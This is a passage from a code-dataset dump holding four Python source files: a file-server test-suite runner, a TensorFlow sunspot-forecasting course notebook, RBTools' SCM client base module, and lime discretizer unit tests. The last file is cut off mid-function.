blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 3 281 | content_id stringlengths 40 40 | detected_licenses listlengths 0 57 | license_type stringclasses 2
values | repo_name stringlengths 6 116 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringclasses 313
values | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 18.2k 668M ⌀ | star_events_count int64 0 102k | fork_events_count int64 0 38.2k | gha_license_id stringclasses 17
values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 107
values | src_encoding stringclasses 20
values | language stringclasses 1
value | is_vendor bool 2
classes | is_generated bool 2
classes | length_bytes int64 4 6.02M | extension stringclasses 78
values | content stringlengths 2 6.02M | authors listlengths 1 1 | author stringlengths 0 175 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
33005c08d1fa27ad94fd3cfce0a9e2a34fb73d30 | 71ef27e3ab0ad5831169fd978ceb643315e338b5 | /FileServer/htmlrunall.py | a438dd80ed1df2a4f18984c2c0ac753323ff5691 | [] | no_license | BetterMe1/FileServer | 8e26e968be3a4c433b1397411a475f75973d9cac | 28d221361716c891d6c61afbfe9753db8250ae9d | refs/heads/master | 2020-06-26T12:03:14.132580 | 2019-07-30T10:07:02 | 2019-07-30T10:07:02 | 199,625,983 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,035 | py | # -*- coding: utf-8 -*-
#手工添加案例到套件
import HTMLTestRunner
import os
import sys
import time
import unittest
from FileServer import testupload, testview, testdown, testdelete
def createsuite():
    """Assemble the upload/view/download/delete test cases into one suite."""
    case_classes = (testupload.Testupload, testview.Testview,
                    testdown.Testdown, testdelete.Testdelete)
    suite = unittest.TestSuite()
    for case_class in case_classes:
        suite.addTest(unittest.makeSuite(case_class))
    return suite
if __name__ == "__main__":
    # Directory containing this script.
    curpath = sys.path[0]
    # Timestamp used to make each report filename unique.
    now = time.strftime("%Y-%m-%d-%H %M %S", time.localtime(time.time()))
    reportdir = curpath + '/resultreport'
    if not os.path.exists(reportdir):
        os.makedirs(reportdir)
    filename = reportdir + '/' + now + 'resultreport.html'
    with open(filename, 'wb') as fp:
        # Emit the HTML report.
        runner = HTMLTestRunner.HTMLTestRunner(stream=fp,
                                               title=u'测试报告',
                                               description=u'用例执行情况',
                                               verbosity=2)
        runner.run(createsuite())
"1754217281@qq.com"
] | 1754217281@qq.com |
1b86396c56bba0043c82a7ddfa850a584867cba8 | 88a98cbddb0aa0b70a387f2b39f3a81db1e8501c | /inst/python/course4/week4/Lesson5.py | 28c7115b1e249502f596f8a0fc7e3b199eaa0658 | [] | no_license | ifrit98/tensorflow-coursera | e4a88c8da8d1cc447d92bb3b9b2359ebf458c512 | 4f593d38a350fa89ec594a2bfdefa808256a8f95 | refs/heads/master | 2022-08-03T06:11:58.429806 | 2020-05-31T16:23:08 | 2020-05-31T16:23:08 | 262,175,379 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,013 | py | # -*- coding: utf-8 -*-
"""S+P Week 4 Lesson 5.ipynb
Automatically generated by Colaboratory.
Original file is located at
https://colab.research.google.com/github/lmoroney/dlaicourse/blob/master/TensorFlow%20In%20Practice/Course%204%20-%20S%2BP/S%2BP%20Week%204%20Lesson%205.ipynb
"""
#@title Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import tensorflow as tf
print(tf.__version__)
import numpy as np
import matplotlib.pyplot as plt
def plot_series(time, series, format="-", start=0, end=None):
    """Plot series[start:end] against time[start:end], with axis labels
    and a grid. `format` is a matplotlib format string."""
    window = slice(start, end)
    plt.plot(time[window], series[window], format)
    plt.xlabel("Time")
    plt.ylabel("Value")
    plt.grid(True)
# IPython/Colab shell magic: download the sunspots dataset. This line is
# not valid plain-Python syntax and only runs inside a notebook.
!wget --no-check-certificate \
  https://storage.googleapis.com/laurencemoroney-blog.appspot.com/Sunspots.csv \
  -O /tmp/sunspots.csv
import csv
time_step = []
sunspots = []
# Parse the CSV: column 0 is the time step index, column 2 the monthly
# mean sunspot number; the header row is skipped with next().
with open('/tmp/sunspots.csv') as csvfile:
  reader = csv.reader(csvfile, delimiter=',')
  next(reader)
  for row in reader:
    sunspots.append(float(row[2]))
    time_step.append(int(row[0]))
series = np.array(sunspots)
time = np.array(time_step)
plt.figure(figsize=(10, 6))
plot_series(time, series)
# NOTE(review): the four lines below exactly duplicate the four above
# (a notebook cell pasted twice); harmless but redundant.
series = np.array(sunspots)
time = np.array(time_step)
plt.figure(figsize=(10, 6))
plot_series(time, series)
# Hold out everything after step 3000 as the validation split.
split_time = 3000
time_train = time[:split_time]
x_train = series[:split_time]
time_valid = time[split_time:]
x_valid = series[split_time:]
window_size = 30
batch_size = 32
shuffle_buffer_size = 1000
def windowed_dataset(series, window_size, batch_size, shuffle_buffer):
    """Build a shuffled tf.data pipeline of (window, one-step-shifted
    target) pairs from a 1-D series, batched and prefetched."""
    series = tf.expand_dims(series, axis=-1)
    return (tf.data.Dataset.from_tensor_slices(series)
            .window(window_size + 1, shift=1, drop_remainder=True)
            .flat_map(lambda w: w.batch(window_size + 1))
            .shuffle(shuffle_buffer)
            .map(lambda w: (w[:-1], w[1:]))
            .batch(batch_size)
            .prefetch(1))
def model_forecast(model, series, window_size):
    """Run the model over every length-`window_size` sliding window of
    `series` and return the stacked predictions."""
    windows = tf.data.Dataset.from_tensor_slices(series)
    windows = windows.window(window_size, shift=1, drop_remainder=True)
    windows = windows.flat_map(lambda w: w.batch(window_size))
    return model.predict(windows.batch(32).prefetch(1))
# ---- Learning-rate sweep -------------------------------------------------
# Reset graph state and fix seeds so the sweep is reproducible.
tf.keras.backend.clear_session()
tf.random.set_seed(51)
np.random.seed(51)
window_size = 64
batch_size = 256
train_set = windowed_dataset(x_train, window_size, batch_size, shuffle_buffer_size)
print(train_set)
print(x_train.shape)
# Conv1D front end feeding two stacked LSTMs; the final Lambda rescales the
# output toward the data's natural range (sunspot counts in the hundreds).
model = tf.keras.models.Sequential([
  tf.keras.layers.Conv1D(filters=32, kernel_size=5,
                      strides=1, padding="causal",
                      activation="relu",
                      input_shape=[None, 1]),
  tf.keras.layers.LSTM(64, return_sequences=True),
  tf.keras.layers.LSTM(64, return_sequences=True),
  tf.keras.layers.Dense(30, activation="relu"),
  tf.keras.layers.Dense(10, activation="relu"),
  tf.keras.layers.Dense(1),
  tf.keras.layers.Lambda(lambda x: x * 400)
])
# Grow the learning rate exponentially each epoch (1e-8 upward) so the
# loss-vs-lr curve plotted below reveals a good fixed learning rate.
lr_schedule = tf.keras.callbacks.LearningRateScheduler(
    lambda epoch: 1e-8 * 10**(epoch / 20))
optimizer = tf.keras.optimizers.SGD(lr=1e-8, momentum=0.9)
model.compile(loss=tf.keras.losses.Huber(),
              optimizer=optimizer,
              metrics=["mae"])
history = model.fit(train_set, epochs=100, callbacks=[lr_schedule])
plt.semilogx(history.history["lr"], history.history["loss"])
plt.axis([1e-8, 1e-4, 0, 60])
# ---- Final training run --------------------------------------------------
tf.keras.backend.clear_session()
tf.random.set_seed(51)
np.random.seed(51)
train_set = windowed_dataset(x_train, window_size=60, batch_size=100, shuffle_buffer=shuffle_buffer_size)
model = tf.keras.models.Sequential([
  tf.keras.layers.Conv1D(filters=60, kernel_size=5,
                      strides=1, padding="causal",
                      activation="relu",
                      input_shape=[None, 1]),
  tf.keras.layers.LSTM(60, return_sequences=True),
  tf.keras.layers.LSTM(60, return_sequences=True),
  tf.keras.layers.Dense(30, activation="relu"),
  tf.keras.layers.Dense(10, activation="relu"),
  tf.keras.layers.Dense(1),
  tf.keras.layers.Lambda(lambda x: x * 400)
])
# Fixed learning rate chosen from the loss-vs-lr sweep above.
optimizer = tf.keras.optimizers.SGD(lr=1e-5, momentum=0.9)
model.compile(loss=tf.keras.losses.Huber(),
              optimizer=optimizer,
              metrics=["mae"])
history = model.fit(train_set,epochs=500)
# Forecast over the whole series, then slice out the validation span.
# NOTE(review): window_size here is still 64 (set in the sweep cell) even
# though this model was trained with windows of 60 -- confirm intentional.
rnn_forecast = model_forecast(model, series[..., np.newaxis], window_size)
rnn_forecast = rnn_forecast[split_time - window_size:-1, -1, 0]
plt.figure(figsize=(10, 6))
plot_series(time_valid, x_valid)
plot_series(time_valid, rnn_forecast)
# Mean absolute error of the forecast on the validation split.
tf.keras.metrics.mean_absolute_error(x_valid, rnn_forecast).numpy()
import matplotlib.image as mpimg
import matplotlib.pyplot as plt
#-----------------------------------------------------------
# Retrieve a list of list results on training and test data
# sets for each training epoch
#-----------------------------------------------------------
loss=history.history['loss']
epochs=range(len(loss)) # Get number of epochs
#------------------------------------------------
# Plot training and validation loss per epoch
#------------------------------------------------
plt.plot(epochs, loss, 'r')
plt.title('Training loss')
plt.xlabel("Epochs")
plt.ylabel("Loss")
plt.legend(["Loss"])
plt.figure()
# Zoom in on epochs 200-500, after the initial rapid loss decrease.
zoomed_loss = loss[200:]
zoomed_epochs = range(200,500)
#------------------------------------------------
# Plot training and validation loss per epoch
#------------------------------------------------
plt.plot(zoomed_epochs, zoomed_loss, 'r')
plt.title('Training loss')
plt.xlabel("Epochs")
plt.ylabel("Loss")
plt.legend(["Loss"])
plt.figure()
print(rnn_forecast)
| [
"jason.st.george@neidinc.com"
] | jason.st.george@neidinc.com |
cd9c5f0b38a417ed37d7647c132d0f6a38efce1e | 066e874cc6d72d82e098d81a220cbbb1d66948f7 | /.hubspot/lib/python2.7/site-packages/rbtools/clients/__init__.py | dfb90185c05b6a487e37edf0bffcced75b55a8a2 | [] | no_license | webdeveloper001/flask-inboundlead | 776792485a998a0eaa4b14016c3a2066e75ff2a2 | d0a539d86342e9efc54d0c0a1adc02c609f0f762 | refs/heads/master | 2021-01-19T01:34:55.241144 | 2017-04-05T00:42:03 | 2017-04-05T00:42:03 | 87,248,885 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 17,675 | py | from __future__ import print_function, unicode_literals
import logging
import pkg_resources
import re
import six
import sys
from rbtools.utils.process import die, execute
# The clients are lazy loaded via load_scmclients()
SCMCLIENTS = None
class PatchResult(object):
    """The result of a patch operation.

    This stores state on whether the patch could be applied (fully or
    partially), whether there are conflicts that can be resolved (as in
    conflict markers, not reject files), which files conflicted, and the
    patch output.
    """
    def __init__(self, applied, has_conflicts=False,
                 conflicting_files=None, patch_output=None):
        """Initialize the result.

        ``conflicting_files`` defaults to a fresh empty list. (The previous
        ``=[]`` default was a shared mutable default argument: mutating one
        result's list would silently change every other default-constructed
        result.)
        """
        self.applied = applied
        self.has_conflicts = has_conflicts
        self.conflicting_files = (conflicting_files
                                  if conflicting_files is not None else [])
        self.patch_output = patch_output
class SCMClient(object):
    """A base representation of an SCM tool.

    These are used for fetching repository information and generating diffs.
    Concrete subclasses (Git, Mercurial, Perforce, ...) override the probe,
    diff and history methods below; the capability flags advertise which
    optional operations a given client supports.
    """
    name = None
    # Capability flags; subclasses flip these to True when they implement
    # the corresponding optional feature.
    supports_diff_extra_args = False
    supports_diff_exclude_patterns = False
    supports_patch_revert = False
    can_amend_commit = False
    can_merge = False
    can_push_upstream = False
    can_delete_branch = False
    def __init__(self, config=None, options=None):
        # config: parsed .reviewboardrc contents; options: parsed
        # command-line options. capabilities is filled in later by callers.
        self.config = config or {}
        self.options = options
        self.capabilities = None
    def get_repository_info(self):
        # Subclasses return a RepositoryInfo when the working directory is a
        # checkout of their SCM type; None means "not this SCM".
        return None
    def check_options(self):
        # Hook for subclasses to validate SCM-specific command-line options.
        pass
    def get_changenum(self, revisions):
        """Return the change number for the given revisions.
        This is only used when the client is supposed to send a change number
        to the server (such as with Perforce).
        Args:
            revisions (dict):
                A revisions dictionary as returned by ``parse_revision_spec``.
        Returns:
            unicode:
            The change number to send to the Review Board server.
        """
        return None
    def scan_for_server(self, repository_info):
        """Find the server path.
        This will search for the server name in the .reviewboardrc config
        files. These are loaded with the current directory first, and searching
        through each parent directory, and finally $HOME/.reviewboardrc last.
        """
        return self._get_server_from_config(self.config, repository_info)
    # NOTE(review): the mutable default arguments on the next two methods
    # (revisions=[], include_files=[], ...) are only read, never mutated,
    # so they are safe here -- but subclass overrides must not append to
    # them, or state would leak across calls.
    def parse_revision_spec(self, revisions=[]):
        """Parses the given revision spec.
        The 'revisions' argument is a list of revisions as specified by the
        user. Items in the list do not necessarily represent a single revision,
        since the user can use SCM-native syntaxes such as "r1..r2" or "r1:r2".
        SCMTool-specific overrides of this method are expected to deal with
        such syntaxes.
        This will return a dictionary with the following keys:
            'base':        A revision to use as the base of the resulting diff.
            'tip':         A revision to use as the tip of the resulting diff.
            'parent_base': (optional) The revision to use as the base of a
                           parent diff.
        These will be used to generate the diffs to upload to Review Board (or
        print). The diff for review will include the changes in (base, tip],
        and the parent diff (if necessary) will include (parent, base].
        If a single revision is passed in, this will return the parent of that
        revision for 'base' and the passed-in revision for 'tip'.
        If zero revisions are passed in, this will return revisions relevant
        for the "current change". The exact definition of what "current" means
        is specific to each SCMTool backend, and documented in the
        implementation classes.
        """
        return {
            'base': None,
            'tip': None,
        }
    def diff(self, revisions, include_files=[], exclude_patterns=[],
             extra_args=[]):
        """
        Returns the generated diff and optional parent diff for this
        repository.
        The return value must be a dictionary, and must have, at a minimum,
        a 'diff' field. A 'parent_diff' can also be provided.
        It may also return 'base_commit_id', representing the revision/ID of
        the commit that the diff or parent diff is based on. This exists
        because in some diff formats, this may different from what's provided
        in the diff.
        """
        return {
            'diff': None,
            'parent_diff': None,
            'base_commit_id': None,
        }
    def _get_server_from_config(self, config, repository_info):
        # Resolve the Review Board server URL from config: a flat
        # REVIEWBOARD_URL wins; otherwise look the repository path up in the
        # per-tree TREES mapping.
        if 'REVIEWBOARD_URL' in config:
            return config['REVIEWBOARD_URL']
        elif 'TREES' in config:
            trees = config['TREES']
            if not isinstance(trees, dict):
                die('Warning: "TREES" in config file is not a dict!')
            # If repository_info is a list, check if any one entry is in trees.
            path = None
            if isinstance(repository_info.path, list):
                for path in repository_info.path:
                    if path in trees:
                        break
                else:
                    # for/else: no entry matched, so reset path.
                    path = None
            elif repository_info.path in trees:
                path = repository_info.path
            if path and 'REVIEWBOARD_URL' in trees[path]:
                return trees[path]['REVIEWBOARD_URL']
        return None
    def _get_p_number(self, base_path, base_dir):
        """Return the appropriate value for the -p argument to patch.
        This function returns an integer. If the integer is -1, then the -p
        option should not be provided to patch. Otherwise, the return value is
        the argument to patch -p.
        """
        if base_path and base_dir.startswith(base_path):
            return base_path.count('/') + 1
        else:
            return -1
    def _strip_p_num_slashes(self, files, p_num):
        """Strips the smallest prefix containing p_num slashes from file names.
        To match the behavior of the patch -pX option, adjacent slashes are
        counted as a single slash.
        """
        if p_num > 0:
            # '[^/]*/+' eats one path component plus any run of slashes;
            # sub() with count=p_num strips p_num components.
            regex = re.compile(r'[^/]*/+')
            return [regex.sub('', f, p_num) for f in files]
        else:
            return files
    def _execute(self, cmd, *args, **kwargs):
        """
        Prints the results of the executed command and returns
        the data result from execute.
        """
        return execute(cmd, ignore_errors=True, *args, **kwargs)
    def has_pending_changes(self):
        """Checks if there are changes waiting to be committed.
        Derived classes should override this method if they wish to support
        checking for pending changes.
        """
        raise NotImplementedError
    def apply_patch(self, patch_file, base_path, base_dir, p=None,
                    revert=False):
        """Apply the patch and return a PatchResult indicating its success."""
        # Figure out the -p argument for patch. We override the calculated
        # value if it is supplied via a commandline option.
        # NOTE(review): `p or ...` falls back to the computed value when p
        # is 0, even though -p0 is a legal patch argument -- confirm callers
        # never pass 0 deliberately.
        p_num = p or self._get_p_number(base_path, base_dir)
        cmd = ['patch']
        if revert:
            cmd.append('-R')
        if p_num >= 0:
            cmd.append('-p%d' % p_num)
        cmd.extend(['-i', six.text_type(patch_file)])
        # Ignore return code 2 in case the patch file consists of only empty
        # files, which 'patch' can't handle. Other 'patch' errors also give
        # return code 2, so we must check the command output.
        rc, patch_output = execute(cmd, extra_ignore_errors=(2,),
                                   return_error_code=True)
        only_garbage_in_patch = ('patch: **** Only garbage was found in the '
                                 'patch input.\n')
        if (patch_output and patch_output.startswith('patch: **** ') and
            patch_output != only_garbage_in_patch):
            die('Failed to execute command: %s\n%s' % (cmd, patch_output))
        # Check the patch for any added/deleted empty files to handle.
        if self.supports_empty_files():
            try:
                with open(patch_file, 'rb') as f:
                    patch = f.read()
            except IOError as e:
                logging.error('Unable to read file %s: %s', patch_file, e)
                return
            patched_empty_files = self.apply_patch_for_empty_files(
                patch, p_num, revert=revert)
            # If there are no empty files in a "garbage-only" patch, the patch
            # is probably malformed.
            if (patch_output == only_garbage_in_patch and
                not patched_empty_files):
                die('Failed to execute command: %s\n%s' % (cmd, patch_output))
        # TODO: Should this take into account apply_patch_for_empty_files ?
        #       The return value of that function is False both when it fails
        #       and when there are no empty files.
        return PatchResult(applied=(rc == 0), patch_output=patch_output)
    def create_commit(self, message, author, run_editor,
                      files=[], all_files=False):
        """Creates a commit based on the provided message and author.
        Derived classes should override this method if they wish to support
        committing changes to their repositories.
        """
        raise NotImplementedError
    def get_commit_message(self, revisions):
        """Returns the commit message from the commits in the given revisions.
        This pulls out the first line from the commit messages of the
        given revisions. That is then used as the summary.
        """
        commit_message = self.get_raw_commit_message(revisions)
        lines = commit_message.splitlines()
        if not lines:
            return None
        result = {
            'summary': lines[0],
        }
        # Try to pull the body of the commit out of the full commit
        # description, so that we can skip the summary.
        if len(lines) >= 3 and lines[0] and not lines[1]:
            # "summary, blank line, body" layout: use everything after the
            # blank line as the description.
            result['description'] = '\n'.join(lines[2:]).strip()
        else:
            result['description'] = commit_message
        return result
    def delete_branch(self, branch_name, merged_only=True):
        """Deletes the specified branch.
        If merged_only is False, then the branch will be deleted even if not
        yet merged into an upstream branch.
        """
        raise NotImplementedError
    def merge(self, target, destination, message, author, squash=False,
              run_editor=False):
        """Merges the target branch with destination branch."""
        raise NotImplementedError
    def push_upstream(self, remote_branch):
        """Pushes the current branch to upstream."""
        raise NotImplementedError
    def get_raw_commit_message(self, revisions):
        """Extracts the commit messages on the commits in the given revisions.
        Derived classes should override this method in order to allow callers
        to fetch commit messages. This is needed for description guessing.
        If a derived class is unable to fetch the description, ``None`` should
        be returned.
        Callers that need to differentiate the summary from the description
        should instead use get_commit_message().
        """
        raise NotImplementedError
    def get_current_branch(self):
        """Returns the repository branch name of the current directory.
        Derived classes should override this method if they are able to
        determine the current branch of the working directory.
        If a derived class is unable to unable to determine the branch,
        ``None`` should be returned.
        """
        raise NotImplementedError
    def supports_empty_files(self):
        """Check if the RB server supports added/deleted empty files.
        This method returns False. To change this behaviour, override it in a
        subclass.
        """
        return False
    def apply_patch_for_empty_files(self, patch, p_num, revert=False):
        """Return True if any empty files in the patch are applied.
        If there are no empty files in the patch or if an error occurs while
        applying the patch, we return False.
        """
        raise NotImplementedError
    def amend_commit_description(self, message, revisions=None):
        """Update a commit message to the given string.
        The optional revisions argument exists to provide compatibility with
        SCMs that allow modification of multiple changesets at any given time.
        It takes a parsed revision spec, and will amend the change referenced
        by the tip revision therein.
        """
        raise NotImplementedError
class RepositoryInfo(object):
    """A representation of a source code repository.

    Carries the repository path, the base path of the checkout within it,
    and the capability flags consulted when generating diffs.
    """
    def __init__(self, path=None, base_path=None, supports_changesets=False,
                 supports_parent_diffs=False):
        self.path = path
        self.base_path = base_path
        self.supports_changesets = supports_changesets
        self.supports_parent_diffs = supports_parent_diffs
        # Lazy %-style args: only formatted if DEBUG logging is enabled.
        logging.debug('repository info: %s', self)

    def __str__(self):
        return 'Path: %s, Base path: %s, Supports changesets: %s' % \
            (self.path, self.base_path, self.supports_changesets)

    def set_base_path(self, base_path):
        """Normalize and store the base path, ensuring a leading slash."""
        if not base_path.startswith('/'):
            base_path = '/' + base_path
        # Bug fix: the old code passed a single tuple for two %s
        # placeholders, which raised "not enough arguments for format
        # string" whenever DEBUG records were actually formatted.
        logging.debug('changing repository info base_path from %s to %s',
                      self.base_path, base_path)
        self.base_path = base_path

    def find_server_repository_info(self, server):
        """
        Try to find the repository from the list of repositories on the server.
        For Subversion, this could be a repository with a different URL. For
        all other clients, this is a noop.
        """
        return self
def load_scmclients(config, options):
    """Populate the global SCMCLIENTS registry from entry points.

    Each ``rbtools_scm_clients`` entry point is loaded and instantiated
    with the given config and options; failures are logged and skipped.
    """
    global SCMCLIENTS
    SCMCLIENTS = {}
    entry_points = pkg_resources.iter_entry_points(
        group='rbtools_scm_clients')
    for entry_point in entry_points:
        try:
            client_class = entry_point.load()
            SCMCLIENTS[entry_point.name] = client_class(config=config,
                                                        options=options)
        except Exception:
            logging.exception('Could not load SCM Client "%s"',
                              entry_point.name)
def scan_usable_client(config, options, client_name=None):
    """Find an SCM client matching the current directory.

    Returns a (RepositoryInfo, SCMClient) pair, or exits the process when
    no usable repository is found or when option/client combinations are
    invalid.
    """
    from rbtools.clients.perforce import PerforceClient
    repository_info = None
    tool = None
    # TODO: We should only load all of the scm clients if the
    # client_name isn't provided.
    if SCMCLIENTS is None:
        load_scmclients(config, options)
    # Restrict the probe to one client when the user named a type.
    if client_name:
        if client_name not in SCMCLIENTS:
            logging.error('The provided repository type "%s" is invalid.' %
                          client_name)
            sys.exit(1)
        else:
            scmclients = {
                client_name: SCMCLIENTS[client_name]
            }
    else:
        scmclients = SCMCLIENTS
    # Probe each candidate client until one recognizes the working
    # directory.
    for name, tool in six.iteritems(scmclients):
        logging.debug('Checking for a %s repository...' % tool.name)
        repository_info = tool.get_repository_info()
        if repository_info:
            break
    if not repository_info:
        if client_name:
            logging.error('The provided repository type was not detected '
                          'in the current directory.')
        elif getattr(options, 'repository_url', None):
            logging.error('No supported repository could be accessed at '
                          'the supplied url.')
        else:
            logging.error('The current directory does not contain a checkout '
                          'from a supported source code repository.')
        sys.exit(1)
    # Verify that options specific to an SCM Client have not been mis-used.
    if (getattr(options, 'change_only', False) and
        not repository_info.supports_changesets):
        sys.stderr.write('The --change-only option is not valid for the '
                         'current SCM client.\n')
        sys.exit(1)
    if (getattr(options, 'parent_branch', None) and
        not repository_info.supports_parent_diffs):
        sys.stderr.write('The --parent option is not valid for the '
                         'current SCM client.\n')
        sys.exit(1)
    if (not isinstance(tool, PerforceClient) and
        (getattr(options, 'p4_client', None) or
         getattr(options, 'p4_port', None))):
        sys.stderr.write('The --p4-client and --p4-port options are not valid '
                         'for the current SCM client.\n')
        sys.exit(1)
    return (repository_info, tool)
def print_clients(config, options):
    """Print the supported detected SCM clients.

    Each SCM client, including those provided by third party packages,
    will be printed. Additionally, SCM clients which are detected in
    the current directory will be highlighted.
    """
    print('The following repository types are supported by this installation')
    print('of RBTools. Each "<type>" may be used as a value for the')
    print('"--repository-type=<type>" command line argument. Repository types')
    print('which are detected in the current directory are marked with a "*"')
    print('[*] "<type>": <Name>')
    if SCMCLIENTS is None:
        load_scmclients(config, options)
    for name, tool in six.iteritems(SCMCLIENTS):
        # A '*' marker means the client recognized the current directory.
        marker = ' * ' if tool.get_repository_info() else '   '
        print('%s"%s": %s' % (marker, name, tool.name))
| [
"jamesbrown1018@outlook.com"
] | jamesbrown1018@outlook.com |
a6d5a3c2c9e3bd52dec4be3aadc2b1a52e67fa68 | 771c084505182ddad6728ae68972ae5917159035 | /lime/tests/test_discretize.py | a551a7d1595a08052a2466fe98798eaca0123efb | [
"BSD-2-Clause"
] | permissive | Shopify/lime | 3bb9f494b8173dfbca5b289fd1b3d260bec43aa2 | 4d915072af7e9979c27396a7c7ed97ed54524e54 | refs/heads/master | 2023-06-28T03:31:56.352447 | 2019-08-02T01:50:02 | 2019-08-02T01:50:02 | 199,914,515 | 5 | 6 | BSD-2-Clause | 2023-03-22T06:59:58 | 2019-07-31T19:09:59 | JavaScript | UTF-8 | Python | false | false | 8,124 | py | from unittest import TestCase
import numpy as np
from sklearn.datasets import load_iris
from lime.discretize import QuartileDiscretizer, DecileDiscretizer, EntropyDiscretizer
class TestDiscretize(TestCase):
    """Tests for lime's quartile/decile/entropy feature discretizers."""
    def setUp(self):
        # Use the iris dataset as a small, well-known fixture.
        iris = load_iris()
        self.feature_names = iris.feature_names
        self.x = iris.data
        self.y = iris.target
    def check_random_state_for_discretizer_class(self, DiscretizerClass):
        """Check discretize/undiscretize reproducibility for one class:
        equal random_state values must produce identical results and
        different values must produce different results."""
        # ----------------------------------------------------------------------
        # -----------Check if the same random_state produces the same-----------
        # -------------results for different discretizer instances.-------------
        # ----------------------------------------------------------------------
        discretizer = DiscretizerClass(self.x, [], self.feature_names, self.y,
                                       random_state=10)
        x_1 = discretizer.undiscretize(discretizer.discretize(self.x))
        discretizer = DiscretizerClass(self.x, [], self.feature_names, self.y,
                                       random_state=10)
        x_2 = discretizer.undiscretize(discretizer.discretize(self.x))
        # Every cell must match, i.e. the arrays are identical.
        self.assertEqual((x_1 == x_2).sum(), x_1.shape[0] * x_1.shape[1])
        discretizer = DiscretizerClass(self.x, [], self.feature_names, self.y,
                                       random_state=np.random.RandomState(10))
        x_1 = discretizer.undiscretize(discretizer.discretize(self.x))
        discretizer = DiscretizerClass(self.x, [], self.feature_names, self.y,
                                       random_state=np.random.RandomState(10))
        x_2 = discretizer.undiscretize(discretizer.discretize(self.x))
        self.assertEqual((x_1 == x_2).sum(), x_1.shape[0] * x_1.shape[1])
        # ----------------------------------------------------------------------
        # ---------Check if two different random_state values produces----------
        # -------different results for different discretizers instances.--------
        # ----------------------------------------------------------------------
        discretizer = DiscretizerClass(self.x, [], self.feature_names, self.y,
                                       random_state=10)
        x_1 = discretizer.undiscretize(discretizer.discretize(self.x))
        discretizer = DiscretizerClass(self.x, [], self.feature_names, self.y,
                                       random_state=20)
        x_2 = discretizer.undiscretize(discretizer.discretize(self.x))
        self.assertFalse((x_1 == x_2).sum() == x_1.shape[0] * x_1.shape[1])
        discretizer = DiscretizerClass(self.x, [], self.feature_names, self.y,
                                       random_state=np.random.RandomState(10))
        x_1 = discretizer.undiscretize(discretizer.discretize(self.x))
        discretizer = DiscretizerClass(self.x, [], self.feature_names, self.y,
                                       random_state=np.random.RandomState(20))
        x_2 = discretizer.undiscretize(discretizer.discretize(self.x))
        self.assertFalse((x_1 == x_2).sum() == x_1.shape[0] * x_1.shape[1])
    def test_random_state(self):
        # Run the reproducibility check against all three discretizers.
        self.check_random_state_for_discretizer_class(QuartileDiscretizer)
        self.check_random_state_for_discretizer_class(DecileDiscretizer)
        self.check_random_state_for_discretizer_class(EntropyDiscretizer)
    def test_feature_names_1(self):
        # Expected human-readable bin labels for quartile discretization.
        self.maxDiff = None
        discretizer = QuartileDiscretizer(self.x, [], self.feature_names,
                                          self.y, random_state=10)
        self.assertDictEqual(
            {0: ['sepal length (cm) <= 5.10',
                 '5.10 < sepal length (cm) <= 5.80',
                 '5.80 < sepal length (cm) <= 6.40',
                 'sepal length (cm) > 6.40'],
             1: ['sepal width (cm) <= 2.80',
                 '2.80 < sepal width (cm) <= 3.00',
                 '3.00 < sepal width (cm) <= 3.30',
                 'sepal width (cm) > 3.30'],
             2: ['petal length (cm) <= 1.60',
                 '1.60 < petal length (cm) <= 4.35',
                 '4.35 < petal length (cm) <= 5.10',
                 'petal length (cm) > 5.10'],
             3: ['petal width (cm) <= 0.30',
                 '0.30 < petal width (cm) <= 1.30',
                 '1.30 < petal width (cm) <= 1.80',
                 'petal width (cm) > 1.80']},
            discretizer.names)
    def test_feature_names_2(self):
        # Expected bin labels for decile discretization. Note features 1 and
        # 3 list only 9 bins -- presumably duplicate decile boundaries are
        # collapsed; verify against the discretizer implementation.
        self.maxDiff = None
        discretizer = DecileDiscretizer(self.x, [], self.feature_names, self.y,
                                        random_state=10)
        self.assertDictEqual(
            {0: ['sepal length (cm) <= 4.80',
                 '4.80 < sepal length (cm) <= 5.00',
                 '5.00 < sepal length (cm) <= 5.27',
                 '5.27 < sepal length (cm) <= 5.60',
                 '5.60 < sepal length (cm) <= 5.80',
                 '5.80 < sepal length (cm) <= 6.10',
                 '6.10 < sepal length (cm) <= 6.30',
                 '6.30 < sepal length (cm) <= 6.52',
                 '6.52 < sepal length (cm) <= 6.90',
                 'sepal length (cm) > 6.90'],
             1: ['sepal width (cm) <= 2.50',
                 '2.50 < sepal width (cm) <= 2.70',
                 '2.70 < sepal width (cm) <= 2.80',
                 '2.80 < sepal width (cm) <= 3.00',
                 '3.00 < sepal width (cm) <= 3.10',
                 '3.10 < sepal width (cm) <= 3.20',
                 '3.20 < sepal width (cm) <= 3.40',
                 '3.40 < sepal width (cm) <= 3.61',
                 'sepal width (cm) > 3.61'],
             2: ['petal length (cm) <= 1.40',
                 '1.40 < petal length (cm) <= 1.50',
                 '1.50 < petal length (cm) <= 1.70',
                 '1.70 < petal length (cm) <= 3.90',
                 '3.90 < petal length (cm) <= 4.35',
                 '4.35 < petal length (cm) <= 4.64',
                 '4.64 < petal length (cm) <= 5.00',
                 '5.00 < petal length (cm) <= 5.32',
                 '5.32 < petal length (cm) <= 5.80',
                 'petal length (cm) > 5.80'],
             3: ['petal width (cm) <= 0.20',
                 '0.20 < petal width (cm) <= 0.40',
                 '0.40 < petal width (cm) <= 1.16',
                 '1.16 < petal width (cm) <= 1.30',
                 '1.30 < petal width (cm) <= 1.50',
                 '1.50 < petal width (cm) <= 1.80',
                 '1.80 < petal width (cm) <= 1.90',
                 '1.90 < petal width (cm) <= 2.20',
                 'petal width (cm) > 2.20']},
            discretizer.names)
    def test_feature_names_3(self):
